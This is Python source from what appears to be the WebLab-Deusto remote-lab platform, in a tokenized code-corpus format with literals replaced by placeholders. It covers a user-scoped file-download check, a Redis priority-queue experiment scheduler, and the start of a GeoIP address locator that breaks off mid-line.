        # Fetch the file through the parent panel, then only hand it out if
        # it belongs to the current user (access control on downloads).
        uf = super(MyAccessesPanel, self).get_file(id)
        if uf is None:
            return None
        user_information = get_app_instance(self).get_user_information()
        user = self.session.query(model.DbUser).filter_by(login=user_information.login).one()
        if uf.experiment_use.user == user:
            return uf
        return None


class ProfileHomeView(WebLabAdminIndexView):
    """Landing page of the profile area for the logged-in user."""

    def __init__(self, db_session, **kwargs):
        self._db_session = db_session
        super(ProfileHomeView, self).__init__(**kwargs)

    @expose()
    def index(self):
        user_information = get_app_instance(self).get_user_information()
        return self.render("<STR_LIT>", is_admin=get_app_instance(self).is_admin(), admin_url=get_app_instance(self).full_admin_url, user_information=user_information)

    def is_accessible(self):
        return get_app_instance(self).get_user_information() is not None

    def _handle_view(self, name, **kwargs):
        # Redirect anonymous users to the login page, preserving the target.
        if not self.is_accessible():
            return redirect(url_for('<STR_LIT>', next=request.url))
        return super(ProfileHomeView, self)._handle_view(name, **kwargs)
<s> from __future__ import print_function , unicode_literals <EOL> import time <EOL> import datetime <EOL> import random <EOL> import json <EOL> from voodoo . log import logged <EOL> import voodoo . log as log <EOL> from voodoo . typechecker import typecheck <EOL> from voodoo . gen import CoordAddress <EOL> import voodoo . sessions . session_id as SessionId <EOL> from voodoo . override import Override <EOL> from weblab . core . coordinator . exc import ExpiredSessionError <EOL> from weblab . core . coordinator . scheduler_transactions_synchronizer import SchedulerTransactionsSynchronizer <EOL> from weblab . core . coordinator . scheduler import Scheduler <EOL> import weblab . core . coordinator . status as WSS <EOL> from weblab . core . coordinator . resource import Resource <EOL> from weblab . data . experiments import ExperimentInstanceId , ExperimentId <EOL> from weblab . core . coordinator . redis . constants import ( <EOL> WEBLAB_RESOURCE_RESERVATION_PQUEUE , <EOL> WEBLAB_RESOURCE_SLOTS , <EOL> WEBLAB_RESOURCE_RESERVATIONS , <EOL> WEBLAB_RESOURCE_PQUEUE_RESERVATIONS , <EOL> WEBLAB_RESOURCE_PQUEUE_POSITIONS , <EOL> WEBLAB_RESOURCE_PQUEUE_MAP , <EOL> WEBLAB_RESOURCE_PQUEUE_SORTED , <EOL> WEBLAB_RESOURCE_PQUEUE_INSTANCE_RESERVATIONS , <EOL> LAB_COORD , <EOL> CLIENT_INITIAL_DATA , <EOL> REQUEST_INFO , <EOL> EXPERIMENT_TYPE , <EOL> EXPERIMENT_INSTANCE , <EOL> START_TIME , <EOL> TIME , <EOL> INITIALIZATION_IN_ACCOUNTING , <EOL> PRIORITY , <EOL> TIMESTAMP_BEFORE , <EOL> TIMESTAMP_AFTER , <EOL> LAB_SESSION_ID , <EOL> EXP_INFO , <EOL> INITIAL_CONFIGURATION , <EOL> RESOURCE_INSTANCE , <EOL> ACTIVE_STATUS , <EOL> STATUS_RESERVED , <EOL> STATUS_WAITING_CONFIRMATION , <EOL> ) <EOL> EXPIRATION_TIME = <NUM_LIT:6> * <NUM_LIT> <EOL> DEBUG = False <EOL> def exc_checker ( func ) : <EOL> def wrapper ( * args , ** kwargs ) : <EOL> try : <EOL> return func ( * args , ** kwargs ) <EOL> except : <EOL> if DEBUG : <EOL> import traceback <EOL> traceback . print_exc ( ) <EOL> log . 
log ( <EOL> PriorityQueueScheduler , log . level . Error , <EOL> "<STR_LIT>" % func . __name__ ) <EOL> log . log_exc ( PriorityQueueScheduler , log . level . Warning ) <EOL> raise <EOL> wrapper . __name__ = func . __name__ <EOL> wrapper . __doc__ = func . __doc__ <EOL> return wrapper <EOL> TIME_ANTI_RACE_CONDITIONS = <NUM_LIT:0.1> <EOL> class PriorityQueueScheduler ( Scheduler ) : <EOL> def __init__ ( self , generic_scheduler_arguments , randomize_instances = True , ** kwargs ) : <EOL> super ( PriorityQueueScheduler , self ) . __init__ ( generic_scheduler_arguments , ** kwargs ) <EOL> self . randomize_instances = randomize_instances <EOL> self . _synchronizer = SchedulerTransactionsSynchronizer ( self ) <EOL> self . _synchronizer . start ( ) <EOL> @ Override ( Scheduler ) <EOL> def stop ( self ) : <EOL> self . _synchronizer . stop ( ) <EOL> @ Override ( Scheduler ) <EOL> def is_remote ( self ) : <EOL> return False <EOL> @ exc_checker <EOL> @ logged ( ) <EOL> @ Override ( Scheduler ) <EOL> @ typecheck ( typecheck . ANY , typecheck . ANY , Resource ) <EOL> def removing_current_resource_slot ( self , client , resource ) : <EOL> weblab_resource_instance_reservations = WEBLAB_RESOURCE_PQUEUE_INSTANCE_RESERVATIONS % ( resource . resource_type , resource . resource_instance ) <EOL> current_reservation_ids = client . smembers ( weblab_resource_instance_reservations ) <EOL> if len ( current_reservation_ids ) > <NUM_LIT:0> : <EOL> current_reservation_id = list ( current_reservation_ids ) [ <NUM_LIT:0> ] <EOL> if client . srem ( weblab_resource_instance_reservations , current_reservation_id ) : <EOL> self . reservations_manager . downgrade_confirmation ( current_reservation_id ) <EOL> self . resources_manager . release_resource ( resource ) <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , current_reservation_id ) <EOL> reservation_data_str = client . get ( weblab_reservation_pqueue ) <EOL> reservation_data = json . 
loads ( reservation_data_str ) <EOL> reservation_data . pop ( ACTIVE_STATUS , None ) <EOL> reservation_data . pop ( TIMESTAMP_BEFORE , None ) <EOL> reservation_data . pop ( TIMESTAMP_AFTER , None ) <EOL> reservation_data . pop ( LAB_SESSION_ID , None ) <EOL> reservation_data . pop ( EXP_INFO , None ) <EOL> reservation_data_str = json . dumps ( reservation_data ) <EOL> reservation_data = client . set ( weblab_reservation_pqueue , reservation_data_str ) <EOL> weblab_resource_pqueue_map = WEBLAB_RESOURCE_PQUEUE_MAP % self . resource_type_name <EOL> weblab_resource_pqueue_sorted = WEBLAB_RESOURCE_PQUEUE_SORTED % self . resource_type_name <EOL> filled_reservation_id = client . hget ( weblab_resource_pqueue_map , current_reservation_id ) <EOL> client . zadd ( weblab_resource_pqueue_sorted , filled_reservation_id , - <NUM_LIT:1> ) <EOL> return True <EOL> return False <EOL> @ exc_checker <EOL> @ logged ( ) <EOL> @ Override ( Scheduler ) <EOL> def reserve_experiment ( self , reservation_id , experiment_id , time , priority , initialization_in_accounting , client_initial_data , request_info ) : <EOL> """<STR_LIT>""" <EOL> client = self . redis_maker ( ) <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , reservation_id ) <EOL> weblab_resource_reservations = WEBLAB_RESOURCE_RESERVATIONS % self . resource_type_name <EOL> weblab_resource_pqueue_reservations = WEBLAB_RESOURCE_PQUEUE_RESERVATIONS % self . resource_type_name <EOL> weblab_resource_pqueue_positions = WEBLAB_RESOURCE_PQUEUE_POSITIONS % self . resource_type_name <EOL> weblab_resource_pqueue_map = WEBLAB_RESOURCE_PQUEUE_MAP % self . resource_type_name <EOL> weblab_resource_pqueue_sorted = WEBLAB_RESOURCE_PQUEUE_SORTED % self . resource_type_name <EOL> current_position = client . incr ( weblab_resource_pqueue_positions ) <EOL> filled_reservation_id = "<STR_LIT>" % ( str ( current_position ) . zfill ( <NUM_LIT:100> ) , reservation_id ) <EOL> pipeline = client . 
pipeline ( ) <EOL> pipeline . hset ( weblab_resource_pqueue_map , reservation_id , filled_reservation_id ) <EOL> pipeline . zadd ( weblab_resource_pqueue_sorted , filled_reservation_id , priority ) <EOL> pipeline . sadd ( weblab_resource_reservations , reservation_id ) <EOL> pipeline . sadd ( weblab_resource_pqueue_reservations , reservation_id ) <EOL> generic_data = { <EOL> TIME : time , <EOL> INITIALIZATION_IN_ACCOUNTING : initialization_in_accounting , <EOL> PRIORITY : priority , <EOL> } <EOL> pipeline . set ( weblab_reservation_pqueue , json . dumps ( generic_data ) ) <EOL> pipeline . execute ( ) <EOL> return self . get_reservation_status ( reservation_id ) <EOL> @ exc_checker <EOL> @ logged ( ) <EOL> @ Override ( Scheduler ) <EOL> def get_reservation_status ( self , reservation_id ) : <EOL> self . _remove_expired_reservations ( ) <EOL> expired = self . reservations_manager . update ( reservation_id ) <EOL> if expired : <EOL> self . _delete_reservation ( reservation_id ) <EOL> raise ExpiredSessionError ( "<STR_LIT>" ) <EOL> self . _synchronizer . request_and_wait ( ) <EOL> reservation_id_with_route = '<STR_LIT>' % ( reservation_id , reservation_id , self . core_server_route ) <EOL> client = self . redis_maker ( ) <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , reservation_id ) <EOL> reservation_data_str = client . get ( weblab_reservation_pqueue ) <EOL> if reservation_data_str is None : <EOL> log . log ( <EOL> PriorityQueueScheduler , log . level . Error , <EOL> "<STR_LIT>" ) <EOL> return WSS . WaitingInstancesQueueStatus ( reservation_id_with_route , <NUM_LIT:50> ) <EOL> reservation_data = json . loads ( reservation_data_str ) <EOL> if ACTIVE_STATUS in reservation_data : <EOL> status = reservation_data [ ACTIVE_STATUS ] <EOL> if status == STATUS_WAITING_CONFIRMATION : <EOL> return WSS . WaitingConfirmationQueueStatus ( reservation_id_with_route , self . 
core_server_url ) <EOL> str_lab_coord_address = reservation_data [ LAB_COORD ] <EOL> obtained_time = reservation_data [ TIME ] <EOL> initialization_in_accounting = reservation_data [ INITIALIZATION_IN_ACCOUNTING ] <EOL> lab_session_id = reservation_data [ LAB_SESSION_ID ] <EOL> initial_configuration = reservation_data [ INITIAL_CONFIGURATION ] <EOL> timestamp_before_tstamp = reservation_data [ TIMESTAMP_BEFORE ] <EOL> timestamp_after_tstamp = reservation_data [ TIMESTAMP_AFTER ] <EOL> if EXP_INFO in reservation_data and reservation_data [ EXP_INFO ] : <EOL> exp_info = json . loads ( reservation_data [ EXP_INFO ] ) <EOL> else : <EOL> exp_info = { } <EOL> timestamp_before = datetime . datetime . fromtimestamp ( timestamp_before_tstamp ) <EOL> timestamp_after = datetime . datetime . fromtimestamp ( timestamp_after_tstamp ) <EOL> lab_coord_address = CoordAddress . translate ( str_lab_coord_address ) <EOL> if initialization_in_accounting : <EOL> before = timestamp_before_tstamp <EOL> else : <EOL> before = timestamp_after_tstamp <EOL> if before is not None : <EOL> remaining = ( before + obtained_time ) - self . time_provider . get_time ( ) <EOL> else : <EOL> remaining = obtained_time <EOL> return WSS . LocalReservedStatus ( reservation_id_with_route , lab_coord_address , SessionId . SessionId ( lab_session_id ) , exp_info , obtained_time , initial_configuration , timestamp_before , timestamp_after , initialization_in_accounting , remaining , self . core_server_url ) <EOL> weblab_resource_pqueue_map = WEBLAB_RESOURCE_PQUEUE_MAP % self . resource_type_name <EOL> weblab_resource_pqueue_sorted = WEBLAB_RESOURCE_PQUEUE_SORTED % self . resource_type_name <EOL> filled_reservation_id = client . hget ( weblab_resource_pqueue_map , reservation_id ) <EOL> if filled_reservation_id is None : <EOL> log . log ( <EOL> PriorityQueueScheduler , log . level . Error , <EOL> "<STR_LIT>" ) <EOL> return WSS . 
WaitingInstancesQueueStatus ( reservation_id_with_route , <NUM_LIT:50> ) <EOL> position = client . zrank ( weblab_resource_pqueue_sorted , filled_reservation_id ) <EOL> if position is None : <EOL> time . sleep ( TIME_ANTI_RACE_CONDITIONS * random . random ( ) ) <EOL> return self . get_reservation_status ( reservation_id ) <EOL> if self . resources_manager . are_resource_instances_working ( self . resource_type_name ) : <EOL> return WSS . WaitingQueueStatus ( reservation_id_with_route , position ) <EOL> else : <EOL> return WSS . WaitingInstancesQueueStatus ( reservation_id_with_route , position ) <EOL> @ exc_checker <EOL> @ logged ( ) <EOL> @ Override ( Scheduler ) <EOL> def confirm_experiment ( self , reservation_id , lab_session_id , initial_configuration , exp_info ) : <EOL> self . _remove_expired_reservations ( ) <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , reservation_id ) <EOL> client = self . redis_maker ( ) <EOL> pqueue_reservation_data_str = client . get ( weblab_reservation_pqueue ) <EOL> if pqueue_reservation_data_str is None : <EOL> return <EOL> pqueue_reservation_data = json . loads ( pqueue_reservation_data_str ) <EOL> resource_instance_str = pqueue_reservation_data . get ( RESOURCE_INSTANCE ) <EOL> if resource_instance_str is not None : <EOL> resource_instance = Resource . parse ( resource_instance_str ) <EOL> if not self . resources_manager . check_working ( resource_instance ) : <EOL> return <EOL> pqueue_reservation_data [ LAB_SESSION_ID ] = lab_session_id . id <EOL> pqueue_reservation_data [ INITIAL_CONFIGURATION ] = initial_configuration <EOL> pqueue_reservation_data [ TIMESTAMP_AFTER ] = self . time_provider . get_time ( ) <EOL> pqueue_reservation_data [ ACTIVE_STATUS ] = STATUS_RESERVED <EOL> pqueue_reservation_data [ EXP_INFO ] = json . dumps ( exp_info ) <EOL> pqueue_reservation_data_str = json . dumps ( pqueue_reservation_data ) <EOL> client . 
set ( weblab_reservation_pqueue , pqueue_reservation_data_str ) <EOL> @ exc_checker <EOL> @ logged ( ) <EOL> @ Override ( Scheduler ) <EOL> def finish_reservation ( self , reservation_id ) : <EOL> self . _remove_expired_reservations ( ) <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , reservation_id ) <EOL> client = self . redis_maker ( ) <EOL> pqueue_reservation_data_str = client . get ( weblab_reservation_pqueue ) <EOL> if pqueue_reservation_data_str is None : <EOL> return <EOL> pqueue_reservation_data = json . loads ( pqueue_reservation_data_str ) <EOL> if ACTIVE_STATUS in pqueue_reservation_data : <EOL> enqueue_free_experiment_args = self . _clean_current_reservation ( reservation_id ) <EOL> else : <EOL> enqueue_free_experiment_args = None <EOL> self . _delete_reservation ( reservation_id ) <EOL> if enqueue_free_experiment_args is not None : <EOL> self . confirmer . enqueue_free_experiment ( * enqueue_free_experiment_args ) <EOL> def _clean_current_reservation ( self , reservation_id ) : <EOL> client = self . redis_maker ( ) <EOL> enqueue_free_experiment_args = None <EOL> if reservation_id is not None : <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , reservation_id ) <EOL> reservation_data_str = client . get ( weblab_reservation_pqueue ) <EOL> if reservation_data_str is not None : <EOL> downgraded = self . reservations_manager . downgrade_confirmation ( reservation_id ) <EOL> if downgraded : <EOL> reservation_data = json . loads ( reservation_data_str ) <EOL> resource_instance_str = reservation_data . get ( RESOURCE_INSTANCE ) <EOL> if resource_instance_str is not None : <EOL> resource_instance = Resource . parse ( resource_instance_str ) <EOL> weblab_resource_pqueue_instance_reservations = WEBLAB_RESOURCE_PQUEUE_INSTANCE_RESERVATIONS % ( resource_instance . resource_type , resource_instance . resource_instance ) <EOL> client . 
srem ( weblab_resource_pqueue_instance_reservations , reservation_id ) <EOL> lab_session_id = reservation_data . get ( LAB_SESSION_ID ) <EOL> experiment_instance_str = reservation_data . get ( EXPERIMENT_INSTANCE ) <EOL> experiment_instance_id = ExperimentInstanceId . parse ( experiment_instance_str ) <EOL> if experiment_instance_id is not None : <EOL> lab_coord_address = reservation_data . get ( LAB_COORD ) <EOL> enqueue_free_experiment_args = ( lab_coord_address , reservation_id , lab_session_id , experiment_instance_id ) <EOL> return enqueue_free_experiment_args <EOL> def update ( self ) : <EOL> self . _update_queues ( ) <EOL> @ exc_checker <EOL> def _update_queues ( self ) : <EOL> previously_waiting_reservation_ids = [ ] <EOL> weblab_resource_pqueue_map = WEBLAB_RESOURCE_PQUEUE_MAP % self . resource_type_name <EOL> weblab_resource_pqueue_sorted = WEBLAB_RESOURCE_PQUEUE_SORTED % self . resource_type_name <EOL> weblab_resource_slots = WEBLAB_RESOURCE_SLOTS % self . resource_type_name <EOL> while True : <EOL> client = self . redis_maker ( ) <EOL> filled_waiting_reservation_ids = client . zrangebyscore ( weblab_resource_pqueue_sorted , - <NUM_LIT> , + <NUM_LIT> , start = <NUM_LIT:0> , num = len ( previously_waiting_reservation_ids ) + <NUM_LIT:1> ) <EOL> first_waiting_reservation_id = None <EOL> for filled_waiting_reservation_id in filled_waiting_reservation_ids : <EOL> waiting_reservation_id = filled_waiting_reservation_id [ filled_waiting_reservation_id . find ( '<STR_LIT:_>' ) + <NUM_LIT:1> : ] <EOL> if waiting_reservation_id not in previously_waiting_reservation_ids : <EOL> first_waiting_reservation_id = waiting_reservation_id <EOL> break <EOL> if first_waiting_reservation_id is None : <EOL> return <EOL> previously_waiting_reservation_ids . append ( first_waiting_reservation_id ) <EOL> free_instances = [ Resource ( self . resource_type_name , resource_instance ) <EOL> for resource_instance in client . 
smembers ( weblab_resource_slots ) ] <EOL> if len ( free_instances ) == <NUM_LIT:0> : <EOL> return <EOL> if self . randomize_instances : <EOL> randomized_free_instances = [ free_instance for free_instance in free_instances ] <EOL> random . shuffle ( randomized_free_instances ) <EOL> else : <EOL> randomized_free_instances = sorted ( free_instances , cmp = lambda r1 , r2 : cmp ( r1 . resource_type , r2 . resource_type ) or cmp ( r1 . resource_instance , r2 . resource_instance ) ) <EOL> for free_instance in randomized_free_instances : <EOL> working = self . resources_manager . check_working ( free_instance ) <EOL> if not working : <EOL> continue <EOL> confirmed = self . reservations_manager . confirm ( first_waiting_reservation_id ) <EOL> if not confirmed : <EOL> break <EOL> acquired = self . resources_manager . acquire_resource ( free_instance ) <EOL> if not acquired : <EOL> self . reservations_manager . downgrade_confirmation ( first_waiting_reservation_id ) <EOL> continue <EOL> weblab_resource_pqueue_instance_reservations = WEBLAB_RESOURCE_PQUEUE_INSTANCE_RESERVATIONS % ( self . resource_type_name , free_instance . resource_instance ) <EOL> client . sadd ( weblab_resource_pqueue_instance_reservations , first_waiting_reservation_id ) <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , first_waiting_reservation_id ) <EOL> pqueue_reservation_data_str = client . get ( weblab_reservation_pqueue ) <EOL> reservation_data = self . reservations_manager . get_reservation_data ( first_waiting_reservation_id ) <EOL> if pqueue_reservation_data_str is None or reservation_data is None : <EOL> self . resources_manager . release_resource ( free_instance ) <EOL> client . srem ( weblab_resource_pqueue_instance_reservations , first_waiting_reservation_id ) <EOL> break <EOL> pqueue_reservation_data = json . loads ( pqueue_reservation_data_str ) <EOL> start_time = self . time_provider . 
get_time ( ) <EOL> total_time = pqueue_reservation_data [ TIME ] <EOL> pqueue_reservation_data [ START_TIME ] = start_time <EOL> pqueue_reservation_data [ TIMESTAMP_BEFORE ] = start_time <EOL> pqueue_reservation_data [ ACTIVE_STATUS ] = STATUS_WAITING_CONFIRMATION <EOL> pqueue_reservation_data [ RESOURCE_INSTANCE ] = free_instance . to_weblab_str ( ) <EOL> initialization_in_accounting = pqueue_reservation_data [ INITIALIZATION_IN_ACCOUNTING ] <EOL> client_initial_data = reservation_data [ CLIENT_INITIAL_DATA ] <EOL> request_info = json . loads ( reservation_data [ REQUEST_INFO ] ) <EOL> username = request_info . get ( '<STR_LIT:username>' ) <EOL> locale = request_info . get ( '<STR_LIT>' ) <EOL> requested_experiment_type = ExperimentId . parse ( reservation_data [ EXPERIMENT_TYPE ] ) <EOL> selected_experiment_instance = None <EOL> experiment_instances = self . resources_manager . list_experiment_instance_ids_by_resource ( free_instance ) <EOL> for experiment_instance in experiment_instances : <EOL> if experiment_instance . to_experiment_id ( ) == requested_experiment_type : <EOL> selected_experiment_instance = experiment_instance <EOL> if selected_experiment_instance is None : <EOL> self . reservations_manager . downgrade_confirmation ( first_waiting_reservation_id ) <EOL> self . resources_manager . release_resource ( free_instance ) <EOL> client . srem ( weblab_resource_pqueue_instance_reservations , first_waiting_reservation_id ) <EOL> continue <EOL> pqueue_reservation_data [ EXPERIMENT_INSTANCE ] = selected_experiment_instance . to_weblab_str ( ) <EOL> laboratory_coord_address = self . resources_manager . get_laboratory_coordaddress_by_experiment_instance_id ( selected_experiment_instance ) <EOL> pqueue_reservation_data [ LAB_COORD ] = laboratory_coord_address <EOL> client . set ( weblab_reservation_pqueue , json . dumps ( pqueue_reservation_data ) ) <EOL> filled_reservation_id = client . 
hget ( weblab_resource_pqueue_map , first_waiting_reservation_id ) <EOL> client . zrem ( weblab_resource_pqueue_sorted , filled_reservation_id ) <EOL> deserialized_server_initial_data = { <EOL> '<STR_LIT>' : '<STR_LIT:%s>' % total_time , <EOL> '<STR_LIT>' : '<STR_LIT:%s>' % datetime . datetime . fromtimestamp ( start_time ) , <EOL> '<STR_LIT>' : initialization_in_accounting , <EOL> '<STR_LIT>' : selected_experiment_instance . exp_name , <EOL> '<STR_LIT>' : selected_experiment_instance . cat_name , <EOL> '<STR_LIT>' : username , <EOL> '<STR_LIT>' : username , <EOL> '<STR_LIT>' : locale , <EOL> } <EOL> server_initial_data = json . dumps ( deserialized_server_initial_data ) <EOL> self . confirmer . enqueue_confirmation ( laboratory_coord_address , first_waiting_reservation_id , selected_experiment_instance , client_initial_data , server_initial_data , self . resource_type_name ) <EOL> break <EOL> @ exc_checker <EOL> def _remove_expired_reservations ( self ) : <EOL> now = self . time_provider . get_time ( ) <EOL> enqueue_free_experiment_args_retrieved = [ ] <EOL> client = self . redis_maker ( ) <EOL> weblab_resource_pqueue_reservations = WEBLAB_RESOURCE_PQUEUE_RESERVATIONS % self . resource_type_name <EOL> reservations = [ reservation_id for reservation_id in client . smembers ( weblab_resource_pqueue_reservations ) ] <EOL> pipeline = client . pipeline ( ) <EOL> for reservation_id in reservations : <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , reservation_id ) <EOL> pipeline . get ( weblab_reservation_pqueue ) <EOL> results = pipeline . execute ( ) <EOL> for reservation_id , reservation_data in zip ( reservations , results ) : <EOL> if reservation_data is not None : <EOL> data = json . loads ( reservation_data ) <EOL> if ACTIVE_STATUS in data : <EOL> total_time = data [ TIME ] <EOL> timestamp_before = data [ TIMESTAMP_BEFORE ] <EOL> timestamp_after = data . 
get ( TIMESTAMP_AFTER ) <EOL> initialization_in_accounting = data [ INITIALIZATION_IN_ACCOUNTING ] <EOL> if timestamp_after is not None or initialization_in_accounting : <EOL> timestamp = timestamp_before if initialization_in_accounting else timestamp_after <EOL> if now >= timestamp + total_time : <EOL> enqueue_free_experiment_args = self . _clean_current_reservation ( reservation_id ) <EOL> enqueue_free_experiment_args_retrieved . append ( enqueue_free_experiment_args ) <EOL> self . _delete_reservation ( reservation_id ) <EOL> self . reservations_manager . delete ( reservation_id ) <EOL> current_expiration_time = datetime . datetime . utcfromtimestamp ( now - EXPIRATION_TIME ) <EOL> for expired_reservation_id in self . reservations_manager . list_expired_reservations ( current_expiration_time ) : <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , expired_reservation_id ) <EOL> pqueue_reservation_data_str = client . get ( weblab_reservation_pqueue ) <EOL> if pqueue_reservation_data_str is None : <EOL> continue <EOL> pqueue_reservation_data = json . loads ( pqueue_reservation_data_str ) <EOL> if ACTIVE_STATUS in pqueue_reservation_data : <EOL> enqueue_free_experiment_args = self . _clean_current_reservation ( expired_reservation_id ) <EOL> enqueue_free_experiment_args_retrieved . append ( enqueue_free_experiment_args ) <EOL> self . _delete_reservation ( expired_reservation_id ) <EOL> self . reservations_manager . delete ( expired_reservation_id ) <EOL> for enqueue_free_experiment_args in enqueue_free_experiment_args_retrieved : <EOL> if enqueue_free_experiment_args is not None : <EOL> self . confirmer . enqueue_free_experiment ( * enqueue_free_experiment_args ) <EOL> def _delete_reservation ( self , reservation_id ) : <EOL> weblab_resource_pqueue_reservations = WEBLAB_RESOURCE_PQUEUE_RESERVATIONS % self . resource_type_name <EOL> weblab_resource_pqueue_map = WEBLAB_RESOURCE_PQUEUE_MAP % self . 
resource_type_name <EOL> weblab_resource_pqueue_sorted = WEBLAB_RESOURCE_PQUEUE_SORTED % self . resource_type_name <EOL> weblab_reservation_pqueue = WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , reservation_id ) <EOL> resource_instances = self . resources_manager . list_resource_instances_by_type ( self . resource_type_name ) <EOL> client = self . redis_maker ( ) <EOL> pipeline = client . pipeline ( ) <EOL> for resource_instance in resource_instances : <EOL> weblab_resource_pqueue_instance_reservations = WEBLAB_RESOURCE_PQUEUE_INSTANCE_RESERVATIONS % ( self . resource_type_name , resource_instance . resource_instance ) <EOL> pipeline . srem ( weblab_resource_pqueue_instance_reservations , reservation_id ) <EOL> pipeline . srem ( weblab_resource_pqueue_reservations , reservation_id ) <EOL> pipeline . delete ( weblab_reservation_pqueue ) <EOL> pipeline . execute ( ) <EOL> filled_reservation_id = client . hget ( weblab_resource_pqueue_map , reservation_id ) <EOL> client . hdel ( weblab_resource_pqueue_map , reservation_id ) <EOL> client . zrem ( weblab_resource_pqueue_sorted , filled_reservation_id ) <EOL> @ Override ( Scheduler ) <EOL> def _clean ( self ) : <EOL> client = self . redis_maker ( ) <EOL> for reservation_id in self . reservations_manager . list_all_reservations ( ) : <EOL> client . delete ( WEBLAB_RESOURCE_RESERVATION_PQUEUE % ( self . resource_type_name , reservation_id ) ) <EOL> client . delete ( WEBLAB_RESOURCE_PQUEUE_INSTANCE_RESERVATIONS % ( self . resource_type_name , '<STR_LIT:*>' ) ) <EOL> for resource_instance in self . resources_manager . list_resource_instances_by_type ( self . resource_type_name ) : <EOL> client . delete ( WEBLAB_RESOURCE_PQUEUE_INSTANCE_RESERVATIONS % ( self . resource_type_name , resource_instance . resource_instance ) ) <EOL> client . delete ( WEBLAB_RESOURCE_PQUEUE_RESERVATIONS % self . resource_type_name ) <EOL> client . delete ( WEBLAB_RESOURCE_PQUEUE_POSITIONS % self . 
resource_type_name ) <EOL> client . delete ( WEBLAB_RESOURCE_PQUEUE_MAP % self . resource_type_name ) <EOL> client . delete ( WEBLAB_RESOURCE_PQUEUE_SORTED % self . resource_type_name ) </s>
<s> from __future__ import print_function , unicode_literals <EOL> import os <EOL> import time <EOL> import socket <EOL> import requests <EOL> import threading <EOL> import traceback <EOL> from geoip2 . errors import GeoIP2Error <EOL> from geoip2 . database import Reader as GeoIP2Reader <EOL> from voodoo . resources_manager import is_testing <EOL> import weblab . configuration_doc as configuration_doc <EOL> def is_private ( ip_address ) : <EOL> if ip_address . startswith ( '<STR_LIT>' ) : <EOL> return True <EOL> if ip_address . startswith ( '<STR_LIT>' ) : <EOL> return True <EOL> if ip_address . startswith ( '<STR_LIT>' ) : <EOL> return True <EOL> if ip_address . startswith ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> return True <EOL> return False <EOL> class AddressLocator ( object ) : <EOL> def __init__ ( self , config , local_city , local_country ) : <EOL> self . config = config <EOL> self . local_city = local_city <EOL> self . local_country = local_country <EOL> def locate ( self , ip_address ) : <EOL> if ip_address . startswith ( "<STR_LIT>" ) and ip_address . endswith ( "<STR_LIT:>>" ) : <EOL> ip_address = ip_address [ len ( "<STR_LIT>" ) : - <NUM_LIT:1> ] <EOL> if ip_address == '<STR_LIT>' or ip_address == '<STR_LIT>' or '<STR_LIT>' in ip_address : <EOL> return { <EOL> '<STR_LIT>' : ip_address , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None <EOL> } <EOL> if '<STR_LIT:U+002CU+0020>' in ip_address : <EOL> ip_address = [ x . strip ( ) for x in ip_address . split ( '<STR_LIT:U+002C>' ) ] [ - <NUM_LIT:1> ] <EOL> try : <EOL> resolved = socket . gethostbyaddr ( ip_address ) [ <NUM_LIT:0> ] <EOL> except Exception : <EOL> if is_private ( ip_address ) : <EOL> resolved = "<STR_LIT>" <EOL> else : <EOL> resolved = ip_address <EOL> city = country = most_specific_subdivision = None <EOL> if is_private ( ip_address ) : <EOL> country = self . local_country <EOL> city = self . 
local_city <EOL> if country is None : <EOL> geoip2_city_filepath = self . config [ configuration_doc . CORE_GEOIP2_CITY_FILEPATH ] <EOL> if geoip2_city_filepath and os . path . exists ( geoip2_city_filepath ) : <EOL> try : <EOL> reader = GeoIP2Reader ( geoip2_city_filepath ) <EOL> city_results = reader . city ( ip_address ) <EOL> if city_results : <EOL> if city_results . country and city_results . country . iso_code : <EOL> country = city_results . country . iso_code <EOL> if city_results . city and city_results . city . name : <EOL> city = city_results . city . name <EOL> if city_results . subdivisions and city_results . subdivisions . most_specific and city_results . subdivisions . most_specific . name : <EOL> most_specific_subdivision = city_results . subdivisions . most_specific . name <EOL> except GeoIP2Error : <EOL> pass <EOL> if country is None : <EOL> geoip2_country_filepath = self . config [ configuration_doc . CORE_GEOIP2_COUNTRY_FILEPATH ] <EOL> if geoip2_country_filepath and os . path . exists ( geoip2_country_filepath ) : <EOL> try : <EOL> reader = GeoIP2Reader ( geoip2_country_filepath ) <EOL> country_results = reader . country ( ip_address ) <EOL> if country_results : <EOL> if country_results . country and country_results . country . iso_code : <EOL> country = city_results . country . iso_code <EOL> except GeoIP2Error : <EOL> pass <EOL> return { <EOL> '<STR_LIT>' : resolved , <EOL> '<STR_LIT>' : city , <EOL> '<STR_LIT>' : country , <EOL> '<STR_LIT>' : most_specific_subdivision <EOL> } <EOL> class LocationRetriever ( threading . Thread ) : <EOL> SECONDS = <NUM_LIT:15> <EOL> def __init__ ( self , config , db ) : <EOL> threading . Thread . __init__ ( self ) <EOL> self . config = config <EOL> self . db = db <EOL> self . setDaemon ( True ) <EOL> self . stopping = False <EOL> self . local_country = config [ configuration_doc . CORE_LOCAL_COUNTRY ] <EOL> self . local_city = config [ configuration_doc . CORE_LOCAL_CITY ] <EOL> geoip2_city_filepath = self . 
